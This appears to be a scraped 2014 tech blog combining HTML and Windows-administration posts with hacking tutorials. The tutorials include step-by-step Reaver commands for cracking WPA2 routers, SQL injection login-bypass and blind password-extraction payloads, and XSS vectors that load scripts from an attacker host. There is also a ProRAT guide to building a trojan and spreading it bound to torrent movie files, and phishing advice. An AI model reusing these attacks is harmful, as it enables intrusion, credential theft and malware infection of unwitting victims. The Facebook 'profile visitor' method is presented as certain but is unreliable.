Tuesday, 23 December 2014

Structuring Documents for the Web

Together, the <html>, <head>, and <body> elements make up the skeleton of an HTML document—
they are the foundation upon which every web page is built.
Inside the <head> element of the first example page, you see a <title> element:
<head>
<title>Popular Websites: Google</title>
</head>
Between the opening <title> tag and the closing </title> tag are the words “Popular Websites:
Google,” or the title of this web page. Figure 1-1 shows the words at the top of the browser window,
which is where browsers such as Internet Explorer, Firefox, and Chrome display the title of a document.
It is also the name they use when you save a page in your Favorites List, and it helps search
engines understand what your page is about. The <title> element is mandatory for all web pages.
The real content of your page is held in the <body> element, which is what you want users to read,
and this is shown in the main browser window.
WARNING The <head> element contains information about the document, which
is not displayed within the main page. The <body> element holds the actual content
of the page viewed in your browser.
You may have noticed that the tags in this example appear in a symmetrical order. If you want to
have one element inside another, both the element’s opening and closing tags must be inside the
containing element. For example, the following is allowed:
<p> This paragraph contains some <em>emphasized text.</em></p>
whereas the following is wrong because the closing </em> tag is not inside the paragraph element:
<p> This paragraph contains some <em>emphasized text. </p></em>
In other words, if an element is to contain another element, it must wholly contain that element.
This is referred to as nesting your elements correctly.
Attributes Tell You about Elements
Attributes in HTML are much like the attributes you experience every day. They are the qualities
that describe a person or thing, such as a tall man or a brown dog. Similarly, HTML elements can
be described in ways that web browsers can understand. This section looks at attributes, starting
with the most important one that beats at the heart of the web.
What differentiates web documents from standard documents are the links (or hyperlinks) that take
you from one web page to another. Look at a link by adding one to the example you just looked at.
Links are created using an <a> element. (The a stands for anchor.)

Introducing Html

As its name suggests, HTML is a markup language, which may sound complicated until you realize
that you come across markup every day. When creating a document in a word processor, you can add
styles to the text to explain the document’s structure. For example, you can distinguish headings from
the main body of the text using a heading style (usually with a larger font). You can use the Return
(or Enter) key to start a new paragraph. You can insert tables into your document to hold data or create
bulleted lists for a series of related points, and so on. Although this does affect the presentation of
the document, the key purpose of this kind of markup is to provide a structure that makes the document
easier to understand.
When marking up documents for the web, you perform a similar process, except you do it by adding
things called tags to the text. With HTML, the key thing to remember is that you must add the tags
to indicate the structure of the document (not how you want it to be presented); for example, which
part of the document is a heading, which parts are paragraphs, what belongs in a table, and so on.
Browsers such as Internet Explorer, Firefox, and Google Chrome all use this markup to help present
the text in a familiar fashion, similar to that of a word processor—main headings are bigger than the
text in paragraphs, there is space above and below each paragraph, and lists of bullet points have a
circle in front of them.
NOTE Although earlier versions of HTML enabled you to control the presentation
of a document—such as which typefaces and colors a document
should use—HTML markup is not supposed to be used to style the document;
that is the job of Cascading Style Sheets (CSS), which you meet in Chapter 7,
“Cascading Style Sheets.”
Now have a look at a simple web page (ch01_eg01.html). You don’t need any special programs to
write web pages; you can simply use a text editor such as Notepad on Windows or TextEdit on a
Mac and save your files with the .html or .htm file extension.
<html>
<head>
<title>Popular Websites: Google</title>
</head>
<body>
<h1>About Google</h1>
<p>Google is best known for its search engine, although
Google now offers a number of other services.</p>
<p>Google's mission is to organize the world's
information and make it universally accessible and
useful.</p>
<p>Its founders Larry Page and Sergey Brin started
Google at Stanford University.</p>
</body>
</html>
This may look a bit confusing at first, but it will all make sense soon. As you can see, there are several
sets of angle brackets with words or letters between them, such as <html>, <head>, </title>, and
</body>. These angle brackets and the words inside them are known as tags, and these are the markup
previously mentioned. Figure 1-1 illustrates what this page would look like in a web browser

God Mode in Windows 7 (Work in Vista & win8 too)

This hidden feature will conveniently put hundreds of settings from all over the OS into one place.

Step:

Create a new folder on your desktop and name it

GodMode.{ED7BA470-8E54-465E-82
5C-99712043E01C}

270 items will automatically be added to the folder consisting of every configurable option in Windows 7.

Happy Computing Folks!!!

Monday, 22 December 2014

Router

It is a layer of three device which is responsible for 
Choosing the best path between source to destination.
it is used in wide Area network. 

 Manufacturer of Router
CISCO , JUNIPER , NORTEN , D-LINK , DAX , IBM Etc.

 

Active Directory Backup & Restoration in Server 2008

Before Going Through this install Backup from Server Manager
1. Open up your command prompt by clicking Start and type “cmd” and hit enter.
2. In your command prompt type 
wbadmin start systemstatebackup -backuptarget:e: 
and press enter.
Note: You can use a different backup target of your choosing
3. Type “y” and press enter to start the backup process.

When the backup is finished running you should get a message that the backup completed successfully. If it did not complete properly you will need to troubleshoot.

Now you have a system state backup of your 2008 Server!
Authoritative Restore of Active Directory
So now what if you accidentally delete an OU, group, or a user account and it’s already replicated to your other servers? We will need to perform an authoritative restore of the Active Directory object you accidentally deleted.
1. To do this you will need to boot into DSRM (Directory Services Restore Mode) by restarting your server and pressing F8 during the restart.
2.Choose Directory Services Restore Mode from the Advanced Boot menu.

3. Login to your server with your DSRM password you created during Active Directory installation.
4. Once you’re logged into your server and in DSRM safe mode, open a command prompt by clicking Start, type “cmd“, and press enter.
5. To make sure you restore the correct backup it’s a good idea to use the “wbadmin get versions” command and write down the version you need to use.

6. Now we need to perform a non-authoritative restore of Active Directory by typing
wbadmin start systemstaterecovery -version:04/14/2009-02:39
Note: The version of backup will vary depending on your situation. Type “y” and press enter to start the non authoritative restore.
7. Go grab some coffee and take a break while the restore completes.

8. You can mark the sysvol as authoritative by adding the –authsysvol switch to the end of the wbadmin command.

9. But if you want to restore a specific Active Directory object then you can use the ever familiar ntdsutil.
For this example we are going to restore a user account with a distinguished name of 
"CN=Test User,CN=Users,DC=example,DC=com"
So the commands would be:
ntdsutil
activate instance ntds
authoritative restore
restore object “cn=Test User,cn=Users,dc=example,dc=com”
Note: The quotes are required

10. Reboot your server into normal mode and you’re finished. The object will be marked as authoritative and replicate to the rest of your domain.

Using Active Directory Snapshots
There is a really cool new feature in Windows Server 2008 called Active Directory Snapshots. Volume Shadow Copy Service now allows us to take a snapshot of Active Directory as a type of backup. They are very quick to create and serve as another line of defense for your backup strategy.
With your server booted into normal mode open a command prompt by clicking Start, type “cmd“, and press enter.
We are going to use the ntdsutil again for creating the Active Directory snapshots. The commands are:
ntdsutil
snapshot
activate instance ntds
create
quit
quit

So now that you have a snapshot of AD, how do you access the data? First we need to mount the snapshot using ntdsutil. The commands are:
ntdsutl
snapshot
list all
mount 1
— (Note: You should mount the correct snapshot you need; for this example there is only 1.)
quit
quit

Your snapshot is mounted, but how do you access the data? We need to use the dsamain command to accomplish this. Then we need to select an LDAP port to use. The command is as follows:

dsamain –dbpath c:\$SNAP_200905141444_VOLUMEC$\WINDOWS\NTDS\ntds.dit –ldapport 10001
The result should look like this:

Now we need to go to Start, Administrative Tools, then Active Directory Users and Computers.
Right click Active Directory Users and Computers and select Change Domain Controller.

In the area that says < Type a Directory Server name [:port] here > enter the name of your server and the LDAP port you used when running the dsamain command.
For my example it would be: WIN-V22UWGW0LU8.HOME.LOCAL:10001

Now you can browse the snapshot of Active Directory without affecting anything else negatively.

Saturday, 20 December 2014

Alternate Data Stream

ADS(Alternate Data Stream):- Windows Has a weired feature in NTFS file system. Which can be used for different purpose. Its upto you. Using this you can hide a file/folder inside an another file so that no one else can see that, most amazingly the file size will not increase. I am giving you an example to hide an exe into a text file. Try it. Visit Ethical hacking Section of my blog & request for detail if you want to know all the aspect of this feature & counter forensic technique.

copy calc.exe from windows\system32 folder to c: drive
Now create a text file (say sample.txt) in c: drive

now run following command
C:\>type calc.exe>sample.txt:calc.exe
Delete the calc.exe.
Now open sample.txt & check its isze also . & then run

C:\>start .\sample.txt:calc.exe

Finding Alternate Data Stream Finding Alternate Data Stream

We can use LADS to find if any Alternate Data Stream is hidden in Our System
Syntax are pretty simple. adding /s is also look for subdirectory

C:\>lads c:\
LADS - Freeware version 4.00

(C) Copyright 1998-2004 Frank Heyne Software (http://www.heysoft.de)
This program lists files with alternate data streams (ADS)
Use LADS on your own risk!
Scanning directory C:\

size ADS in file

---------- ---------------------------------
Error 32 opening C:\pagefile.sys
368146432 C:\sample.txt:pp.avi
18 C:\sample.txt:secret.txt
21 C:\data\:mean.txt
The following summary might be incorrect because there was at least one error!

368132511 bytes in 3 ADS listed



C:\>lads /?

LADS - Freeware version 4.00
(C) Copyright 1998-2004 Frank Heyne Software (http://www.heysoft.de)
This program lists files with alternate data streams (ADS)
Use LADS on your own risk!

Usage: LADS [Directory] [/S] [/D] [/A] [/Xname]
Directory: directory to scan, current if ommitted
/S include Subdirectories
/D Debug LADS ;-)
/V Verbose error reports
/A give a summary of All bytes used in the scanned directories
(All files and directories are considered as uncompressed
and all security decriptions are skipped
for calculating this number!)
/Xname eXclude any ADS "name"
/Pfile read Parameters from "file"

C:\> 

Download LADS from LADS DOWNLOAD

In Windows Vista & Higher OS you can try
DIR /R command for the same

WPA2 password hacking How to Crack WPA2 password 802.11 Wifi

Note: Method works only with WPA routers which have WPS support. Most routers sold since   2008 and later are WPS enabled.
         This tutorial for educational purpose only. i am not encouraging anyone to hack into other AP & make them paying high for the internet Bill

Downloads & setup:

    I used  Ubuntu but you can use any linux distro. Root access is must.
    libpcap:- Traffic capture library
    Reaver :-  Hacking tool. Download Reaver-1.4
    Iwscanner:- Wifi scanning Tool. Download link-  Iwscanner 0.24[Ubuntu]  Iwscanner-0.2.4 [Linux generic]

Step 1. Install Libpcap & Its dependencies:

    sudo apt-get update

    sudo apt-get install build-essential

    sudo apt-get install flex bison

    sudo apt-get install libpcap-dev

    sudo apt-get install libpcap3-dev

    sudo apt-get install libsqlite3-dev

    sudo apt-get install libnl2-dev

Step 2. How to Compile/Build Reaver:

Make sure you’ve build-essential, then run following commands (assuming reaver is extracted to desktop):

    cd ~/Desktop/reaver-1.4/src

    ./configure

    make

    sudo make install


Step 3. Identify MAC address of the target router.

You can use any Wifi Scanner like iwScanner  to note the MAC address of the target Wifi SSID.


Step 4. Putting your Wireless card to monitor mode.

Run these commands on terminal:

    sudo ifconfig wlan0 down

    sudo iwconfig wlan0 mode monitor

    sudo ifconfig wlan0 up


Step 5. Starting the attack:

Reaver only requires two inputs to launch an attack: the interface to use to launch them, and the MAC address of the target:

    sudo  reaver -i wlan0 -b 00:11:22:33:44:55  [replace this with target MAC Address ]

Wait for few Our (Yes, patiance is the key)

Step 4. When the attack finishes, it will give you the SSID and authentication password for the target network.

During the attack the target AP can  stop responding & caused a denial of service  DoS attack.

Step by step guide to password hacking Password Hacking

Although password hacking or cracking is not an ultimate goal of an
expert hacker, It is very import in the aspect of security.A newbie who just search google for password hacking & drop into this blog, pls note that you are not going to learn this in a second. 
Before you start reading further, be sure you really know what is password, how & where they can be used.Before we jump into the topic we need to streamline our task.
password attack can be divided into two type:
a) Online Password Attack
b) Offline Password Attack

Note: From now on keep the word "Ethical" in mind & use this knowledge to improve your security, not try these
one corporate network.If you got caught, I will be not there to save you. :)

Coming back to the topic, password attack can be done using  bellow methods:
1) Bruteforce Method :- Trying randomly generated password & 
                                        test them against the server.
2) Dictinory Method:- In this method, all probable password are 
                                    listed in file, each of them tested against
                                   the server.Its faster & having a good dictinory
                                   file can make the task really easy.
3) Rainbow Attack:- This method quite a newer, basically use to crack hash password. To know more about
                                Password hashes go back to Google or request an article here.
Now straight back into the business.
Online password attack:- Do the test in a test network or virtual pc, with simple passwords at the beginning.

I will discuss about two interesting tool for online password attack, Brutus & Hydra. The second one is my fav.
You can download them using below link:
Brutus: Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it's also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available. Brutus was first made publicly available in October 1998.
So its very simple to launch the attack Just type your target IP & select the service type & attack method.
Click on start to launch the attack.If lucky the password will be displayed in few moment.
Try on your local ftp server with a shorter password which make you believe this can work & keep trying.

Hydra: Originally developped by thc, Its better because it bcan run on unix platform & support a lot of protocol then its competitor. Its faster, If you familiar with the command line version with a bit effort you surely fall in love with it. For those, who hate commands, luckily GUI version is also available.But a friendly reminder if you really want to be a hacker start loving command line. Believe me, there is no other alternative. For help regarding it visit http://www.thc.org/thc-hydra/ for detail documentation. If you found it difficult to understand, ask for a post here.
Will continue the topic in my next post. till then happy cracking.
Be a member for more interesting topic.Thank you For reading.

Password Attack using Social Engineering Toolkit

Continuing my last post about password attack.. Have you tried my previously discussed tricks???
Whatever, I will discuss about other password recovery method.
Rather then direct attacking you also try these two method.
1) Phishing:- This method used to create a fake login page of a popular website such as
Gmail, Yahoo, Facebook & Orkut etc .So when ever any user enter username & password it
send to tour per-defined e-mail id.Using it you can easily hack gmail or facebook password.
Though I always ask you to keep the word "Ethical" in mind. So be a good chap. Try it for fun and educational purpose.  Design a absolute duplicate copy of those page are really tough.
But don't worry with the right tool this is piece of cake. The best one I used a lot during my training demonstration is SET(Social Engineering Toolkit). Trust me, with a little look out you can do the phishing attack
in some simple step.

You need
1.An  internet connection
2. SET  (Inbuilt-ed in many Penetration testing distribution such as Backtrack)
3. A little creativity to trap your target (There are lot of method you can use as per your scenario)
4. Having familiar with Backtrack live CD & Metasploit Framework can be a great advantage

Currently I am giving you a great link to know how to use  it.
Step by Step Guide to SET


Beside the phishing SET has lot of feature:-

a) Hack a remote computer
b) Create a exploited USB media, when run on victim PC that will be automatically accessible
c) Running an exploited web server to hack a PC

Let me know if any further guide is needed.

A beginner guide to Sql Injection SQL Injection

SQL injection is currently the most common form of web site attack in that web forms are very common, often they are not coded properly and the hacking tools used to find weaknesses and take advantage of them are commonly available online. This kind of exploit is easy enough to accomplish that even inexperienced hackers can accomplish mischief. However, in the hands of the very skilled hacker, a web code weakness can reveal root level access of web servers and from there attacks on other networked servers can be accomplished.

Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. Databases that use SQL include MS SQL Server, MySQL, Oracle, Access and Filemaker Pro and these databases are equally subject to SQL injection attack.

Web based forms must allow some access to your database to allow entry of data and a response, so this kind of attack bypasses firewalls and endpoint defenses. Any web form, even a simple logon form or search box, might provide access to your data by means of SQL injection if coded incorrectly. 

Take A Note Before Start:
1. Just reading this article will not enough to be master of it.
2. Trying these on any website is unethical & offensive too in many country.
3. Make your hand & mind dirty with SQL syntax before going deep into powerful aspect of this method.
4. Learn to find Vulnerable Site using google. Trust me "Google Hacking Database" will teach you amazing secret of Google.
5. Trust in yourself,Don't allow failure to Stop you.Good Luck  
How to Identify a Site Vulnerable to an SQL Injection Attack:If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote
A vulnerable site may behave oddly & give lengthy error message.


Fingerprinting the Database

Even the SQL language is a standard, every DBMS has its peculiarity and differs from each other in many aspects like special commands, functions to retrieve data such as users names and databases, features, comments line etc.
When the testers move to a more advanced SQL injection exploitation they need to know the backend.

The first way to find out which is the backend is by observing the error returned by the application. Follow are some examples:
MySql:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1
Oracle:
ORA-00933: SQL command not properly ended
MS SQL Server:
Microsoft SQL Native Client error ‘80040e14’
Unclosed quotation mark after the character string
PostgreSQL:
Query failed: ERROR: syntax error at or near
"’" at character 56 in /www/site/test.php on line 121.
To gain access and find a user name:
Enter the string  'OR''='  as both user name and password in the login page. This should get you logged in as a user (it happens to be the first user in the table).It will work if that site is programmed by a novice.
Say you login as "antony". But you will not able to know the password. Don't worry... Read next few line, You can see it also possible.
As you should have gained access as "antony" however you still do not know antony's password. You can now find this out using a little trial and error. Before you continue try taking a guess at antony's password by entering antony as user name and your best guess at his password.
Work out antony's password:
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does antony's password have a w in it?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%') AND ''='
Does antony's password start with w?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE 'w%') AND ''='
Does antony's password have an w followed by d?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of antony's password w?
    ' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '___w%') AND ''='

This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Find a user names using SQL Injection:

You can find other users on the system. We choose to get antony's password simply because he was the first in the list but there may be others.
You can still only ask yes/no questions, but you can find out just about anything you want to with a little patience.
Again you use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
    ' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
    ' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than jake) with an a in his name?
    ' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='

Tools(Click to Download & Try):
1. Havij SQL Injection

2. Pangolin   (Link contain supported download also)
3. The Mole   

4. SQLNinja  (Inbuilt in Backtrack 5)   (Linux Version)
5. Safe3SI    

6. BSQL Hacker (good one, More compitablity)    Link:
7. Sqlmap (My Fav, Little hazy but work fine when used properly)

XSS Unleashed XSS Attack

XSS: XSS stands for Cross Site Scripting.

XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Trust me thousands of website are at risk of this attack. In earlier day I have seen this vulnerability in many popular website like Rediff, Yahoo,Adobe Flash Player, even MI5 website. yahoo still has one great flaw in XSS, If you able to use it you can have access to any Yahoo user account(Unethical though).Don't ask me how to (Be ethical always), To know just google Yahoo DOM XSS
Before You Start:
1.Learn some basic of website scripting.
2.If you are an web developer, make sure you test your site/application before going live.Don't ignore the power of XSS.
3.Try to understand the terms used in this article(In case you are a novice)
4. To get deep into it get trained. 
5. If you are just a Internet User don't fool yourself by thinking if you don't click on any link you will be protected from XSS.  

XSS Attack Vectors:

So how does a hacker infect your web page in the first place? You might think, that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behavior. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?

<SCRIPT>

The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>

Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>

<BODY>

The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>

The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG>

Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

<IFRAME>

The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.

<IFRAME SRC=”http://hacker-site.com/xss.html”>

<INPUT>

If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK>

The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<TABLE>

The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">

The same applies to the <TD> tag, used to separate cells inside a table:

<TD BACKGROUND="javascript:alert('XSS')">

<DIV>

The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the following way:

<DIV STYLE="width: expression(alert('XSS'));">

<OBJECT>

The <OBJECT> tag can be used to pull in a script from an external site in the following way:

<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">

<EMBED>

If the hacker places a malicious script inside a flash file, it can be injected in the following way:

<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">


Testing if a Site is exposed to XSS:
A simple test to see if your website is vulnerable to a cross-site scripting attack is to enter the following code snippet into a form field and submit the form:

<script>alert("Vulnerable to XSS");</script>

If an alert window pops up with the "Vulnerable to XSS" message when the form data is processed and displayed, then the application accepts tags and is at risk because the input data has not been validated either before being processed or being published.
here are three known types of cross site scripting: reflected, stored, and DOM injection. Reflected XSS is the easiest to exploit – a page will reflect user supplied data directly back to the user:

echo $_REQUEST['userinput'];

Stored XSS takes hostile data, stores it in a file, a database, or other back end system, and then at a later stage, displays the data to the user, unfiltered. This is extremely dangerous in systems such as CMS, blogs, or forums, where a large number of users will see input from other individuals.

With DOM based XSS attacks, the site’s JavaScript code and variables are manipulated rather than HTML elements. Alternatively, attacks can be a blend or hybrid of all three types. The danger with cross site scripting is not the type of attack, but that it is possible.

Attacks are usually implemented in JavaScript, which is a powerful scripting language. Using JavaScript allows attackers to manipulate any aspect of the rendered page, including adding new elements (such as adding a login tile which forwards credentials to a hostile site), manipulating any aspect of the internal DOM tree, and deleting or changing the way the page looks and feels. JavaScript allows the use of XmlHttpRequest, which is typically used by sites using AJAX technologies, even if victim site does not use AJAX today.

Tools:

1.Acunetix Web Vulnerability Scanner (testing tool)
2. XSSer (Attack tool with GUI Interface, My fav)
3. XSS-proxy (Powerfull & Customizable, Command line tool) 

    Get your hand dirty with these tool & play fair.Let me know any query you have after reading this article(I'm sure you have a lottt)

A simple Backdor- Hacking For Beginer ProRAT

ProRat is a Microsoft Windows based backdoor trojan horse, more commonly known as a RAT (Remote Administration Tool).
Step 1: Download free software called PRO RAT.
Launch pro rat. Pro rat has a lot options as keylogger, screen shot, file manager, pc shutdown.
Step 2: You should create ProRat Server and send it to the target pc. To create server click on the bottom Create.

Step 3: Enter your IP address, if you don't know your IP address click on red arrow. Also add your email address that will be used to send email notification.

Step 4: Next go to general settings, 5110 is the port that you will connect to the target PC, you can change server password. You can give a fake error message, when the target launches your remote file, error message will be shown. You can type the error message whatever you want. You can use the option to bind with the file. You can bind server with any file. Under server extension I recommend to use EXE (has icon support ) or SCR (has icon support). Under server icon select any icon that you want that your server look out.

Step 5: Click on Create Server. Now you need to send server file to the target pc. There are many ways how you can do it. You can create server file that looks as image and email it to your friends . The most effective way by my opinion is to bind server file to the movie file and upload it to the torrent or any file hosting site.


Step 6: After the target clicks on your server file, you'll be able to connect to the target PC. In main window of pro rat you'll see IP field. Type target PC IP Address. In the port field type 5110 and click Connect.

You’ll see the File Manager of hacked pc. You can download any file from the hacked PC


Download Here : ProRAT 2.0

FIND WHO VISITING YOUR PROFILE !!!

Hey Friends, We all know Facebook didn't have a direct facility to track your profile visitor like orkut. Some Facebook application claim to find out that for you but not so trustable.
I will tell you a genuine way to find it out. Its work 100%.
 
Step 1) Go to your Facebook Profile Page.
Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code       {"list":
Step 5) You find some Facebook Profile Ids
["InitialChatFriendsList",[],{"list":["100005005264935-2","100003364669752-2",
 
Note: The id on 1st is one who visit your profile most!!! :) 
 
Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992965
 Don't Forget to share your feedback when you smile seeing the result

motherbord chicp lavel tranning

Chip level Testing Of Motherboard
Click to Visit Computer Magazine

SQL Server Services and Tools

  Microsoft provides both data management and business intelligence (BI) tools and services together with SQL Server. For data management, S...